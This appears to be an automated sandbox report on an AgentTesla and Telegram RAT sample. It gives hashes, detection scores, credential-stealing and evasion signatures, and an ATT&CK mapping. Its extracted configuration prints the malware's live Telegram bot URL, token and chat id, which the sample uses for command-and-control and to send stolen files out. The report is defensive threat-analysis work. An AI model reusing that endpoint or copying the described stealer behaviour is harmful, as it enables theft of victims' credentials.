Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware2.17994.22795
Overview
General Information
Sample Name: | SecuriteInfo.com.W32.AIDetect.malware2.17994.22795 (renamed file extension from 22795 to exe) |
Analysis ID: | 475297 |
MD5: | 074864aed555c328431042197f317b23 |
SHA1: | 88578f80e1e81150e10582ca3dbd586cbc062277 |
SHA256: | a7ebedb978908d118423d5d542dfac659868feded8cc8b856a29cdef04d3c750 |
Tags: | AgentTeslaexe |
Infos: | |
Most interesting Screenshot: |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
Threatname: Telegram RAT |
---|
{"C2 url": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendMessage"}
Threatname: Agenttesla |
---|
{"Exfil Mode": "Telegram", "Chat id": "1215222063", "Chat URL": "https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocument"}
Yara Overview |
---|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 4 entries |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 1_2_0041DD92 |
Networking: |
---|
Uses the Telegram API (likely for C&C communication) | Show sources |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | JA3 fingerprint: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | Code function: | 1_2_01C70095 |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing: |
---|
Installs a global keyboard hook | Show sources |
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 1_2_0046F5D0 |
Source: | Window created: | Jump to behavior |
Source: | Code function: | 1_2_0041B736 |
System Summary: |
---|
AutoIt script contains suspicious strings | Show sources |
Source: | AutoIt Script: |
Source: | Static PE information: |
Source: | Code function: | 1_2_0046A8DC | |
Source: | Code function: | 1_2_00420183 | |
Source: | Code function: | 1_2_0043599F | |
Source: | Code function: | 1_2_0042DA74 | |
Source: | Code function: | 1_2_0040DCD0 | |
Source: | Code function: | 1_2_0042AC83 | |
Source: | Code function: | 1_2_00408CA0 | |
Source: | Code function: | 1_2_0041AD5C | |
Source: | Code function: | 1_2_00408530 | |
Source: | Code function: | 1_2_00405D32 | |
Source: | Code function: | 1_2_0046F5D0 | |
Source: | Code function: | 1_2_0040BDF0 | |
Source: | Code function: | 1_2_0042BDF6 | |
Source: | Code function: | 1_2_00406670 | |
Source: | Code function: | 1_2_00413680 | |
Source: | Code function: | 1_2_00434EBF | |
Source: | Code function: | 1_2_01C70095 | |
Source: | Code function: | 3_2_009EEC48 | |
Source: | Code function: | 3_2_009E0040 | |
Source: | Code function: | 3_2_009E9870 | |
Source: | Code function: | 3_2_009E39C8 | |
Source: | Code function: | 3_2_009E6A58 | |
Source: | Code function: | 3_2_009ED128 | |
Source: | Code function: | 3_2_009EABA8 | |
Source: | Code function: | 3_2_00ED47A0 | |
Source: | Code function: | 3_2_00ED3CCC | |
Source: | Code function: | 3_2_00ED46B0 | |
Source: | Code function: | 3_2_00ED5490 | |
Source: | Code function: | 3_2_00EDD5E0 | |
Source: | Code function: | 3_2_00ED3CC0 | |
Source: | Code function: | 3_2_00F26160 | |
Source: | Code function: | 3_2_00F26898 | |
Source: | Code function: | 3_2_00F25B2B |
Source: | Code function: | 1_2_004029C2 | |
Source: | Code function: | 1_2_0041B845 | |
Source: | Code function: | 1_2_0046F0A1 | |
Source: | Code function: | 1_2_0046F122 | |
Source: | Code function: | 1_2_0046EA4E | |
Source: | Code function: | 1_2_0046EAA6 | |
Source: | Code function: | 1_2_004702AA | |
Source: | Code function: | 1_2_0046F37C | |
Source: | Code function: | 1_2_0046F3DA | |
Source: | Code function: | 1_2_0046F3AB | |
Source: | Code function: | 1_2_0046F45A | |
Source: | Code function: | 1_2_0046F425 | |
Source: | Code function: | 1_2_0041AC99 | |
Source: | Code function: | 1_2_0046ECBC | |
Source: | Code function: | 1_2_0041AD5C | |
Source: | Code function: | 1_2_0046F5D0 | |
Source: | Code function: | 1_2_0046F594 | |
Source: | Code function: | 1_2_0046FE80 | |
Source: | Code function: | 1_2_0046FF04 | |
Source: | Code function: | 1_2_0041B7F2 | |
Source: | Code function: | 1_2_0046FF91 | |
Source: | Code function: | 1_2_0046EFA8 | |
Source: | Code function: | 1_2_0041AFB4 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Code function: | 1_2_0044D712 |
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 1_2_00446F5B |
Source: | Code function: | 1_2_004031F2 |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 1_2_004277A8 | |
Source: | Code function: | 3_2_00F2B581 |
Source: | Code function: | 1_2_00403EC5 |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Code function: | 1_2_0041F78E |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) | Show sources |
Source: | WMI Queries: |
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) | Show sources |
Source: | WMI Queries: |
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 1_2_0041E47B |
Source: | Code function: | 1_2_0041DD92 |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 1_2_0040374E |
Source: | Code function: | 1_2_004346D0 |
Source: | Code function: | 1_2_00403EC5 |
Source: | Code function: | 1_2_00437CF0 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 1_2_01C70095 | |
Source: | Code function: | 1_2_051606DA | |
Source: | Code function: | 1_2_0516099F | |
Source: | Code function: | 1_2_051609DE | |
Source: | Code function: | 1_2_051608EE | |
Source: | Code function: | 1_2_05160A1C |
Source: | Code function: | 3_2_009EEC48 |
Source: | Memory allocated: | Jump to behavior |
Source: | Code function: | 1_2_00428E3C |
HIPS / PFW / Operating System Protection Evasion: |
---|
Maps a DLL or memory area into another process | Show sources |
Source: | Section loaded: | Jump to behavior |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | Jump to behavior |
Source: | Code function: | 1_2_0041F78E |
Source: | Code function: | 1_2_0040374E |
Source: | Process created: | Jump to behavior |
Source: | Code function: | 1_2_0043BE31 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 1_2_004240DA |
Source: | Code function: | 1_2_0041E47B |
Stealing of Sensitive Information: |
---|
Yara detected Telegram RAT | Show sources |
Source: | File source: | ||
Source: | File source: |
Yara detected AgentTesla | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) | Show sources |
Source: | Key opened: | Jump to behavior |
Tries to harvest and steal ftp login credentials | Show sources |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Tries to steal Mail credentials (via file access) | Show sources |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Tries to harvest and steal browser information (history, passwords, etc) | Show sources |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Telegram RAT | Show sources |
Source: | File source: | ||
Source: | File source: |
Yara detected AgentTesla | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation211 | Path Interception | Exploitation for Privilege Escalation1 | Disable or Modify Tools1 | OS Credential Dumping2 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Obfuscated Files or Information11 | Input Capture121 | File and Directory Discovery2 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing1 | Credentials in Registry1 | System Information Discovery117 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Encrypted Channel12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading1 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture121 | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion131 | LSA Secrets | Security Software Discovery141 | SSH | Clipboard Data1 | Data Transfer Size Limits | Application Layer Protocol2 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection212 | Cached Domain Credentials | Virtualization/Sandbox Evasion131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Process Discovery3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pomf.lain.la | 198.244.149.184 | true | false |
| unknown |
api.telegram.org | 149.154.167.220 | true | false | high |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
198.244.149.184 | pomf.lain.la | United States | 18630 | RIDLEYSD-NETUS | false |
General Information |
---|
Joe Sandbox Version: | 33.0.0 White Diamond |
Analysis ID: | 475297 |
Start date: | 31.08.2021 |
Start time: | 19:38:35 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | SecuriteInfo.com.W32.AIDetect.malware2.17994.22795 (renamed file extension from 22795 to exe) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@3/3@5/2 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
19:39:52 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
198.244.149.184 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
api.telegram.org | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
pomf.lain.la | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
RIDLEYSD-NETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 227053 |
Entropy (8bit): | 7.970128543001109 |
Encrypted: | false |
SSDEEP: | 6144:e/it75AsyC6bWLgemQA9JDHo3rgLoyJzH+:oit7xyX9DHmrgLpR+ |
MD5: | 4FBE43DFCA8480671C4756E93AB1A78C |
SHA1: | 56918E816551A5C5153BA76C8F07CF46666EE62F |
SHA-256: | 1E62864DA238E4396DEC785405F0A67806D16130DDD8FA7946E4D5666811B929 |
SHA-512: | 8E37FFC5D193265351F43A5FAA28E189605B14AEE6E5812618B2714395A23398DF71ACDFF49422F018F5E26CF62A67BBCB854657C286D11C7AF2C14829EFB54D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 227053 |
Entropy (8bit): | 7.970128543001109 |
Encrypted: | false |
SSDEEP: | 6144:e/it75AsyC6bWLgemQA9JDHo3rgLoyJzH+:oit7xyX9DHmrgLpR+ |
MD5: | 4FBE43DFCA8480671C4756E93AB1A78C |
SHA1: | 56918E816551A5C5153BA76C8F07CF46666EE62F |
SHA-256: | 1E62864DA238E4396DEC785405F0A67806D16130DDD8FA7946E4D5666811B929 |
SHA-512: | 8E37FFC5D193265351F43A5FAA28E189605B14AEE6E5812618B2714395A23398DF71ACDFF49422F018F5E26CF62A67BBCB854657C286D11C7AF2C14829EFB54D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 20480 |
Entropy (8bit): | 0.698304057893793 |
Encrypted: | false |
SSDEEP: | 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j |
MD5: | 3806E8153A55C1A2DA0B09461A9C882A |
SHA1: | BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72 |
SHA-256: | 366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE |
SHA-512: | 31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.497866910462094 |
TrID: |
|
File name: | SecuriteInfo.com.W32.AIDetect.malware2.17994.exe |
File size: | 421376 |
MD5: | 074864aed555c328431042197f317b23 |
SHA1: | 88578f80e1e81150e10582ca3dbd586cbc062277 |
SHA256: | a7ebedb978908d118423d5d542dfac659868feded8cc8b856a29cdef04d3c750 |
